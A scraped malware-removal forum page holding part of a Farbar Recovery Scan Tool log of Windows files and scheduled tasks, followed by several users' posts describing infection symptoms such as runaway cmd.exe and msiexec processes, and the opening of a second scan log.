C:\WINDOWS\SysWOW64\VsGraphicsExperiment.dll 2016-09-15 04:59 - 2016-07-15 22:29 - 00134144 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\VsGraphicsCapture.dll 2016-09-15 04:59 - 2016-07-15 22:28 - 01509888 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXToolsOfflineAnalysis.dll 2016-09-15 04:59 - 2016-07-15 22:28 - 00155136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXToolsMonitor.dll 2016-09-15 04:59 - 2016-07-15 22:28 - 00127488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DXToolsReporting.dll 2016-09-15 04:58 - 2016-09-15 04:58 - 00199008 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\wof.sys 2016-09-15 03:30 - 2016-09-19 13:02 - 00000000 ____D C:\Users\GImagineG\Documents\Bulls announce 2016-17 Television Schedule _ Chicago Bulls_files 2016-09-15 03:30 - 2016-09-15 03:30 - 00135491 _____ C:\Users\GImagineG\Documents\Bulls announce 2016-17 Television Schedule _ Chicago Bulls.htm 2016-09-15 03:25 - 2016-09-15 03:27 - 00025088 _____ C:\Users\GImagineG\Documents\Chicago Vulls Schedule.xls 2016-09-15 02:04 - 2016-09-15 02:04 - 00000000 ____D C:\ProgramData\Microsoft OneDrive 2016-09-15 02:03 - 2016-09-15 02:03 - 00000000 ____D C:\Users\GImagineG\AppData\Local\ConnectedDevicesPlatform 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default\My Documents 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default\Documents\My Videos 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default\Documents\My Pictures 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default\Documents\My Music 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default User\Documents\My Videos 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default User\Documents\My Pictures 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 _SHDL C:\Users\Default User\Documents\My Music 2016-09-15 01:16 - 2016-09-15 01:16 - 00000000 ____D C:\ProgramData\USOShared 2016-09-15 01:15 - 2016-09-15 01:15 - 00007623 _____ C:\WINDOWS\diagwrn.xml 2016-09-15 01:15 - 2016-09-15 01:15 - 00007623 _____ C:\WINDOWS\diagerr.xml 2016-09-15 01:14 - 2016-09-19 15:21 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT 2016-09-15 01:14 - 2016-09-15 01:14 - 00022744 _____ C:\WINDOWS\system32\emptyregdb.dat 2016-09-15 01:14 - 2016-09-15 01:14 - 00003454 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA 2016-09-15 01:14 - 2016-09-15 01:14 - 00003432 _____ C:\WINDOWS\System32\Tasks\SafeZone scheduled Autoupdate 1469256672 2016-09-15 01:14 - 2016-09-15 01:14 - 00003392 _____ C:\WINDOWS\System32\Tasks\SUPERAntiSpyware Scheduled Task bdd463d5-961f-4895-aa8b-12fed1956349 2016-09-15 01:14 - 2016-09-15 01:14 - 00003326 _____ C:\WINDOWS\System32\Tasks\SUPERAntiSpyware Scheduled Task 9c97e707-2f6a-49fa-9c39-bf57a7fce1cb 2016-09-15 01:14 - 2016-09-15 01:14 - 00003316 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{6149F0C1-0742-44DD-A521-14C41333BEE7} 2016-09-15 01:14 - 2016-09-15 01:14 - 00003230 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore 2016-09-15 01:14 - 2016-09-15 01:14 - 00002954 _____ C:\WINDOWS\System32\Tasks\Adobe Acrobat Update Task 2016-09-15 01:14 - 2016-09-15 01:14 - 00002672 _____ C:\WINDOWS\System32\Tasks\RealDownloaderDownloaderScheduledTaskS-1-5-21-1554107894-1944105626-794477097-1001 2016-09-15 01:14 - 2016-09-15 01:14 - 00002654 _____ C:\WINDOWS\System32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-1554107894-1944105626-794477097-1001 2016-09-15 01:14 - 2016-09-15 01:14 - 00002552 _____ C:\WINDOWS\System32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-1554107894-1944105626-794477097-1001 2016-09-15 01:14 - 2016-09-15 01:14 - 00002494 _____ C:\WINDOWS\System32\Tasks\RealDownloader Update Check 2016-09-15 01:14 - 2016-09-15 01:14 - 00002162 _____ C:\WINDOWS\System32\Tasks\CCleanerSkipUAC 2016-09-15 01:14 - 2016-09-15 01:14 - 00000020 ___SH C:\Users\GImagineG\ntuser.ini 2016-09-15 01:13 - 2016-09-15 01:13 - 00001576 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Media Player.lnk 2016-09-15 01:13 - 2016-09-15 01:13 - 00000000 ____D C:\Users\Default\Documents\Visual Studio 2008 2016-09-15 01:13 - 2016-09-15 01:13 - 00000000 ____D C:\Users\Default\Documents\Visual Studio 2005 2016-09-15 01:13 - 2016-09-15 01:13 - 00000000 ____D C:\Users\Default\AppData\Local\Microsoft Help 2016-09-15 01:13 - 2016-09-15 01:13 - 00000000 ____D C:\Users\Default User\Documents\Visual Studio 2008 2016-09-15 01:13 - 2016-09-15 01:13 - 00000000 ____D C:\Users\Default User\Documents\Visual Studio 2005 2016-09-15 01:13 - 2016-09-15 01:13 - 00000000 ____D C:\Users\Default User\AppData\Local\Microsoft Help 2016-09-15 01:06 - 2016-07-16 07:41 - 02716672 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll 2016-09-15 01:05 - 2016-09-19 13:03 - 00000000 ____D C:\Users\GImagineG 2016-09-15 01:05 - 2016-09-15 01:13 - 00000000 ____D C:\WINDOWS\system32\config\bbimigrate 2016-09-15 01:05 - 2016-09-15 01:05 - 00000000 _SHDL C:\Users\GImagineG\My Documents 2016-09-15 01:05 - 2016-09-15 01:05 - 00000000 _SHDL C:\Users\GImagineG\Documents\My Videos 2016-09-15 01:05 - 2016-09-15 01:05 - 00000000 _SHDL C:\Users\GImagineG\Documents\My Pictures 2016-09-15 01:05 - 2016-09-15 01:05 - 00000000 _SHDL C:\Users\GImagineG\Documents\My Music 2016-09-15 01:04 - 2016-09-19 18:58 - 00000000 ____D C:\WINDOWS\system32\SleepStudy 2016-09-15 01:04 - 2016-09-19 15:22 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat 2016-09-15 01:04 - 2016-09-15 02:57 - 00329720 _____ C:\WINDOWS\system32\FNTCACHE.DAT 2016-09-15 01:04 - 2016-09-15 01:04 - 00000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat 2016-09-15 01:04 - 2016-09-15 01:04 - 00000000 ____D C:\Program Files\Intel 2016-09-15 01:04 - 2016-09-15 01:04 - 00000000 _____ C:\WINDOWS\system32\GfxValDisplayLog.bin 2016-09-15 01:04 - 2016-05-27 15:50 - 00104584 _____ (Khronos Group) C:\WINDOWS\SysWOW64\OpenCL.DLL 2016-09-15 01:04 - 2016-05-27 15:50 - 00100488 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL 2016-09-05 13:44 - 2016-09-05 16:46 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox 2016-08-31 06:58 - 2016-09-13 02:00 - 00000550 _____ C:\WINDOWS\Tasks\SUPERAntiSpyware Scheduled Task bdd463d5-961f-4895-aa8b-12fed1956349.job 2016-08-31 06:58 - 2016-09-05 16:46 - 00000550 _____ C:\WINDOWS\Tasks\SUPERAntiSpyware Scheduled Task 9c97e707-2f6a-49fa-9c39-bf57a7fce1cb.job ==================== One Month Modified files and folders ======== (If an entry is included in the fixlist, the file/folder will be moved.) 2016-09-19 21:11 - 2015-12-10 02:56 - 00192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys 2016-09-19 18:31 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\rescache 2016-09-19 16:28 - 2016-04-11 17:10 - 00000000 ____D C:\zzmp4 2016-09-19 15:28 - 2016-01-19 15:40 - 00000000 ____D C:\Users\GImagineG\AppData\Local\WORDsearch 11 2016-09-19 15:26 - 2016-01-19 15:40 - 00000000 ____D C:\Program Files (x86)\WORDsearch 11 2016-09-19 15:25 - 2015-12-10 03:29 - 01174306 _____ C:\WINDOWS\system32\PerfStringBackup.INI 2016-09-19 15:22 - 2015-12-10 03:43 - 00000000 __SHD C:\Users\GImagineG\IntelGraphicsProfiles 2016-09-19 15:20 - 2016-07-16 02:04 - 00262144 _____ C:\WINDOWS\system32\config\BBI 2016-09-19 15:20 - 2016-01-19 15:40 - 00000000 ____D C:\Users\GImagineG\Documents\WORDsearch 2016-09-19 15:20 - 2016-01-19 15:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WORDsearch 11 2016-09-19 15:00 - 2016-05-16 21:27 - 00000000 ____D C:\Users\GImagineG\AppData\Local\Sling_cache 2016-09-19 14:35 - 2016-07-16 07:45 - 00000000 ____D C:\WINDOWS\INF 2016-09-19 14:35 - 2015-12-11 07:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Visual Studio 2008 2016-09-19 14:27 - 2016-07-16 07:36 - 00000000 ____D C:\WINDOWS\CbsTemp 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ___RD C:\Program Files\Windows Defender 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ___HD C:\Program Files\WindowsApps 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\MUI 2016-09-19 13:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\registration 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\SysWOW64\downlevel 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\system32\Sysprep 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\system32\downlevel 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\system32\Dism 2016-09-19 13:02 - 2016-07-16 02:04 - 00000000 ____D C:\WINDOWS\servicing 2016-09-19 13:02 - 2016-02-19 09:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Transcender 2016-09-19 13:02 - 2016-01-11 22:35 - 00000000 ____D C:\ProgramData\WORDsearch 2016-09-19 13:02 - 2015-12-15 12:19 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\vlc 2016-09-19 13:02 - 2015-12-10 07:41 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Winamp 2016-09-19 13:01 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\appcompat 2016-09-19 13:01 - 2016-01-11 23:37 - 00000000 ____D C:\ProgramData\Real 2016-09-19 13:01 - 2015-12-11 06:25 - 00000000 ____D C:\Program Files\Reference Assemblies 2016-09-19 13:01 - 2015-12-11 06:25 - 00000000 ____D C:\Program Files (x86)\Reference Assemblies 2016-09-19 13:01 - 2015-12-11 06:25 - 00000000 ____D C:\Program Files (x86)\MSBuild 2016-09-16 05:04 - 2015-12-11 07:05 - 00000000 ____D C:\Users\GImagineG\Documents\SQL Server Management Studio 2016-09-15 05:03 - 2016-07-16 07:47 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ___SD C:\WINDOWS\system32\F12 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ___SD C:\WINDOWS\system32\dsc 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\oobe 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\lv-LV 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\lt-LT 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\et-EE 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\es-MX 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\en-GB 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\appraiser 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\ShellExperiences 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\Provisioning 2016-09-15 05:02 - 2016-07-16 07:47 - 00000000 ____D C:\Program Files (x86)\Windows Defender 2016-09-15 02:26 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\AppReadiness 2016-09-15 02:21 - 2015-12-10 03:31 - 00000000 ____D C:\Users\GImagineG\AppData\Local\Packages 2016-09-15 02:04 - 2015-12-10 03:32 - 00002375 _____ C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk 2016-09-15 02:04 - 2015-12-10 03:32 - 00000000 ___RD C:\Users\GImagineG\OneDrive 2016-09-15 02:03 - 2015-12-10 03:31 - 00000000 __RHD C:\Users\Public\AccountPictures 2016-09-15 01:16 - 2016-07-16 07:47 - 00000000 ____D C:\ProgramData\USOPrivate 2016-09-15 01:15 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase 2016-09-15 01:15 - 2016-07-16 02:04 - 00032768 _____ C:\WINDOWS\system32\config\ELAM 2016-09-15 01:15 - 2015-10-30 03:24 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated 2016-09-15 01:14 - 2016-07-16 07:47 - 00000000 __RSD C:\WINDOWS\Media 2016-09-15 01:14 - 2016-07-16 07:47 - 00000000 __RHD C:\Users\Public\Libraries 2016-09-15 01:14 - 2015-12-10 01:47 - 00000938 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job 2016-09-15 01:13 - 2016-08-01 13:56 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware 2016-09-15 01:13 - 2016-07-16 07:47 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft 2016-09-15 01:13 - 2016-04-21 04:27 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TinyWall 2016-09-15 01:13 - 2016-03-29 07:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight 2016-09-15 01:13 - 2016-02-21 11:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Office Tools 2016-09-15 01:13 - 2016-01-27 00:25 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Notepad++ 2016-09-15 01:13 - 2016-01-11 23:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\RealNetworks 2016-09-15 01:13 - 2015-12-29 19:36 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\CCleaner 2016-09-15 01:13 - 2015-12-15 14:10 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Yamb 2.1.0.0 beta 2 2016-09-15 01:13 - 2015-12-15 13:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\7-Zip 2016-09-15 01:13 - 2015-12-15 12:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\VideoLAN 2016-09-15 01:13 - 2015-12-14 16:35 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008R2 Community & Samples 2016-09-15 01:13 - 2015-12-12 04:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Visual Studio 2015 2016-09-15 01:13 - 2015-12-11 08:23 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Developer Network 2016-09-15 01:13 - 2015-12-11 06:58 - 00000000 ____D C:\WINDOWS\SysWOW64\1033 2016-09-15 01:13 - 2015-12-11 06:58 - 00000000 ____D C:\WINDOWS\system32\1033 2016-09-15 01:13 - 2015-12-11 06:48 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008 2016-09-15 01:13 - 2015-12-10 09:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Cool Edit Pro 2.0 2016-09-15 01:13 - 2015-12-10 09:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Nero 7 Essentials 2016-09-15 01:13 - 2015-12-10 09:11 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\LightScribe Direct Disc Labeling 2016-09-15 01:13 - 2015-12-10 07:41 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Winamp Detector Plug-in 2016-09-15 01:13 - 2015-12-10 07:41 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Winamp 2016-09-15 01:13 - 2015-12-10 05:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\QuickTime 2016-09-15 01:13 - 2015-12-10 02:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware 2016-09-15 01:13 - 2015-10-30 02:28 - 00000000 ____D C:\Users\Default.migrated 2016-09-15 01:08 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\SysWOW64\Macromed 2016-09-15 01:08 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\spool 2016-09-15 01:08 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\system32\Macromed 2016-09-15 01:07 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\LiveKernelReports 2016-09-15 01:07 - 2016-07-16 07:47 - 00000000 ____D C:\WINDOWS\Help 2016-09-15 01:07 - 2016-07-16 07:47 - 00000000 ____D C:\Program Files\Common Files\microsoft shared 2016-09-15 01:07 - 2016-01-26 22:28 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SuperNZB 2016-09-15 01:07 - 2015-12-14 17:19 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008 R2 2016-09-15 01:07 - 2015-12-12 05:49 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows Kits 2016-09-15 01:07 - 2015-12-12 04:55 - 00000000 ____D C:\Program Files\IIS 2016-09-15 01:07 - 2015-12-11 08:18 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Windows SDK v6.0A 2016-09-15 01:07 - 2015-12-11 08:00 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft SQL Server 2008 R2 November CTP 2016-09-15 01:07 - 2015-12-11 06:25 - 00000000 ____D C:\Program Files\MSBuild 2016-09-15 01:07 - 2015-10-30 05:07 - 00000000 ____D C:\WINDOWS\ShellNew 2016-09-15 01:05 - 2016-06-23 23:27 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Sling 2016-09-15 01:05 - 2015-12-10 05:48 - 00000000 ____D C:\Users\GImagineG\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Amazon 2016-09-15 01:04 - 2016-07-16 07:47 - 00000000 ___RD C:\WINDOWS\PrintDialog 2016-09-15 01:04 - 2016-07-16 07:47 - 00000000 ___RD C:\WINDOWS\MiracastView 2016-09-15 01:04 - 2016-07-16 07:47 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel 2016-09-15 00:50 - 2016-07-16 11:17 - 00000000 ___HD C:\$WINDOWS.~BT 2016-09-15 00:12 - 2015-12-10 03:56 - 00000000 ____D C:\WINDOWS\system32\MRT 2016-09-15 00:10 - 2015-12-10 03:56 - 144199024 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe 2016-09-15 00:02 - 2015-12-10 01:47 - 00000942 _____ C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job 2016-09-14 23:51 - 2016-03-29 07:04 - 00000000 ____D C:\Program Files\Microsoft Silverlight 2016-09-14 23:51 - 2016-03-29 07:04 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight 2016-09-14 23:38 - 2015-10-30 03:19 - 00635904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqsnap.dll 2016-09-14 23:38 - 2015-10-30 03:19 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqcertui.dll 2016-09-14 23:31 - 2015-12-12 05:05 - 00000000 ____D C:\Users\GImagineG\Documents\Visual Studio 2015 2016-09-14 23:26 - 2015-12-10 01:47 - 00002272 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk 2016-09-13 07:03 - 2015-12-11 07:02 - 00000000 ____D C:\Users\GImagineG\Documents\Visual Studio 2008 2016-09-07 12:32 - 2016-07-16 07:49 - 00828408 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe 2016-09-07 12:32 - 2016-07-16 07:49 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl 2016-09-05 16:46 - 2016-08-01 13:55 - 00000000 ____D C:\Program Files\SUPERAntiSpyware 2016-09-05 16:46 - 2016-03-29 06:50 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service ==================== Files in the root of some directories ======= 2016-03-29 01:23 - 2016-03-29 01:23 - 0000017 _____ () C:\Users\GImagineG\AppData\Local\resmon.resmoncfg ==================== Bamital & volsnap ================= (There is no automatic fix for files that do not pass verification.) C:\WINDOWS\system32\winlogon.exe => File is digitally signed C:\WINDOWS\system32\wininit.exe => File is digitally signed C:\WINDOWS\explorer.exe => File is digitally signed C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed C:\WINDOWS\system32\svchost.exe => File is digitally signed C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed C:\WINDOWS\system32\services.exe => File is digitally signed C:\WINDOWS\system32\User32.dll => File is digitally signed C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed C:\WINDOWS\system32\userinit.exe => File is digitally signed C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed C:\WINDOWS\system32\rpcss.dll => File is digitally signed C:\WINDOWS\system32\dnsapi.dll => File is digitally signed C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed LastRegBack: 2016-09-15 01:03 ==================== End of FRST.txt ============================
  11. Hi all, I found out i had some malware so i ran MBAM. I found lots of malware, but when i deleted it and restarted my laptop, my explorer.exe (and some other programs) won't start automatically after i login. I found out i can start explorer.exe manually but i would like to get every program to run automatically as before. I now found out that the malware i deleted is stil in quarantine, but if i try to restore some registry data, i get the message: "Can't restore an item marked for deletion on reboot" (ps: I restarted my laptop and no quarantined files seem to be deleted..) I hope someone can help me, i have no idea how i can fix this
  12. Hi, A few days ago I noticed cpu-usage levels were extremely high (100% most of the time). I closed all apps and restarted, computer starts out fine but as soon as I turn on wifi a Notepad launches by itself and computer starts getting really slow. Been noticing several cmd.exe processes open in task manager even tho I haven't launched command prompt. Same thing with conhost.exe msiexec.exe and notepad.exe and more than one explorer.exe Tried to run virus scan, nothing was found - althought Avast Antivirus keeps notifying me that it blocked a threat and that urls were being blocked such as: reannewscomm.com and other spammy-sounding websites. Please let me know if there is any other information you need from me at this point. P.S. I'm running Windows 7 with Avast Antivirus Any help is appreciated. Ahmed
  13. Hopefully someone can help, because after two straight days am at my wits' end. (The FRST log files are after this wall of text) It's a Windows XP SP3 machine, and the following was gleaned from Process Explorer program. Explorer.exe runs sluggishly immediately after logon, taking it's time to bring up the taskbar and desktop icons. It uses over half the processor (and Core 2 Duo 2.something GHz chip) when a window is opened (such as My Computer). It runs poorly but is at least stable, until it is given an internet connection. When connected, the main explorer.exe process then begins spawning multiple cmd.exe and msiexec.exe processes, along with one NOTEPAD.EXE process and a powershell process. All of them, including Explorer, begin connecting to a multitude of IP addresses, and all the while more cmd.exe and msiexec.exe processes are spawned. They slowly eat up RAM, then the page file, until finally the machine runs out of memory and bluescreens, citing TCPIP.sys (or something similar in name) as the culprit. Other information: 1: There is, as far as I can tell, a broken install of McAfee Security Center on the machine. The control interface throws an error page saying that the webpage is unavailable, and the firewall was disabled at some point in the past. The MCPR tool seems to crash either during self-extraction or immediately soon after, and McAfee doesn't appear in the installed programs lists in Programs and Features or CCleaner, so I haven't been able to remove it thus far. 2: Explorer fails to save any alterations to the desktop upon relog or restart. 3: Explorer take s along time to close during logoff, restart, or shutdown. 4: The resolution downgrades itself from the native 1440x900 to 1152x864 upon logon. 5: Explorer opens a window to C:/Program Files/Microsoft, which shows a folder for "Search Enhancement Pack". Many scans were run as part of a CTB-Locker malware removal before finding this forum - hopefully that won't hinder much. ==================== FRST.txt: Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 04-03-2015 Ran by Maureen (administrator) on TYSONSERVER on 07-03-2015 19:15:27 Running from C:\Documents and Settings\Maureen\Desktop\AV SOFTWARES\FRST [2015-03-04] Loaded Profiles: Maureen & Administrator (Available profiles: Maureen & Administrator) Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States) Internet Explorer Version 8 (Default browser: IE) Boot Mode: Normal Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/ ==================== Processes (Whitelisted) ================= (If an entry is included in the fixlist, the process will be closed. The file will not be moved.) (HP) C:\Program Files\HP\HPLaserJetService\HPLaserJetService.exe (iolo technologies, LLC) C:\Program Files\iolo\Common\Lib\ioloServiceManager.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\Binn\sqlservr.exe (Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDFSSvc.exe (Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDUpdSvc.exe (Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe (Intel Corporation) C:\WINDOWS\system32\igfxtray.exe (Intel Corporation) C:\WINDOWS\system32\igfxpers.exe (Intel Corporation) C:\WINDOWS\system32\igfxsrvc.exe (Realtek Semiconductor Corp.) C:\WINDOWS\RTHDCPL.exe (Microsoft® Corporation) C:\Program Files\Common Files\Microsoft Shared\Works Shared\WkUFind.exe (Hewlett-Packard) C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe (Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuschd2.exe () C:\PROGRA~1\HEWLET~1\HPSHAR~1\hpgs2wnf.exe (iolo technologies, LLC) C:\Program Files\iolo\System Mechanic Professional\ioloGovernor.exe (Safer-Networking Ltd.) C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe ==================== Registry (Whitelisted) ================== (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.) HKLM\...\Run: [RTHDCPL] => C:\WINDOWS\RTHDCPL.EXE [16859648 2008-01-09] (Realtek Semiconductor Corp.) HKLM\...\Run: [Microsoft Works Portfolio] => C:\Program Files\Microsoft Works\WksSb.exe [331830 2001-08-23] (Microsoft® Corporation) HKLM\...\Run: [Microsoft Works Update Detection] => C:\Program Files\Common Files\Microsoft Shared\Works Shared\WkUFind.exe [28738 2001-08-16] (Microsoft® Corporation) HKLM\...\Run: [Exaktime SyncCenter] => C:\Program Files\Exaktime\TimeSummit\SyncCenter\SyncCenter.exe [662128 2009-11-09] (Exaktime, Inc.) HKLM\...\Run: [share-to-Web Namespace Daemon] => C:\Program Files\Hewlett-Packard\HP Share-to-Web\hpgs2wnd.exe [57344 2001-07-03] (Hewlett-Packard) HKLM\...\Run: [HP Software Update] => C:\Program Files\Hp\HP Software Update\HPWuSchd2.exe [49208 2010-06-09] (Hewlett-Packard) HKLM\...\Run: [Microsoft Default Manager] => C:\Program Files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe [288080 2009-07-17] (Microsoft Corporation) HKLM\...\Run: [ioloGovernor] => C:\Program Files\iolo\System Mechanic Professional\ioloGovernor.exe [902672 2015-02-12] (iolo technologies, LLC) HKLM\...\Run: [sDTray] => C:\Program Files\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.) HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot% <====== ATTENTION HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%*.exe <====== ATTENTION HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRoot%System32\*.exe <====== ATTENTION HKLM Group Policy restriction on software: %HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\ProgramFilesDir% 